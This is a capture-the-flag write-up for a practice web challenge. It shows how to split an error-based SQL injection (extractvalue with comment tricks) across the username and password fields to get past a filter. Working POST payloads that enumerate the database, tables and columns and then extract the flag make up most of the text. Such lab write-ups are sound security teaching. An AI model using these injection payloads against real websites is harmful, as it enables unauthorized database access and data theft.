Problem solving address:http://ctf5.shiyanbar.com/web/baocuo/index.php
Simply try the echo first, you can know that the general username and password errors are Login failed, and the triggering WAF is the echo in red font
Next, I started to try the filtering logic in the background. In the experiment, it was found that () is not allowed in username, that is to say, the function cannot be used. Isn't it impossible to do error injection?
What about injecting with password? Because the background logic needs to query two fields, the password field can also be injected in this question. It is found that the error reporting functions such as floor and extractvalue are not allowed in password, which means that error injection cannot be done in password.
That is to say, we can write the name of the error reporting function in username and the rest of the statements in password, but there will be redundant 'and password=', so what should we do?
Remember the SQL statement format we learned about? where username='???' and password='???' And in the sql statement, you can use /**/ to comment out the middle SQL statement. That is, we can use /**/ to solve this problem, and /**/ is not eaten, this is called HTTP split injection.
Construct the statement username='or extractvalue /*, password=*/(1, concat(0x5c,(select user()))) or', such a combination is
select * from users where username=''or extractvalue /*' and password='*/(1, concat(0x5c,(select database()))) or'' The database name is reported as an error
The first post parameters are:
username=1' or extractvalue/*
password=*/(1, concat(0x3A,(select database()))) or '1
Get database name information:
XPATH syntax error: ':error_based_hpf'
The second post parameter is: (the next step is to continue to report the table name, it should be noted that = is eaten, you can use in or regexp to bypass )
username=1' or extractvalue/*
password=*/(1,concat(0x3A,(select group_concat(table_name) from information_schema.tables where table_schema regexp 'error_based_hpf'))) or '1
Get database table information:
XPATH syntax error: ':ffll44jj,users'
The third post parameter is:
username=1' or extractvalue/*
password=*/(0x5c,concat(0x3A,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'))) or '1
to get the database Field information of the table:
XPATH syntax error: ':value'
第四次post参数为:
username=1' or extractvalue/*
password=*/(1,concat(0x3A,(select group_concat(value) from ffll44jj))) or '1
获得flag{}信息:
XPATH syntax error: ':flag{err0r_b4sed_sqli_+_hpf}'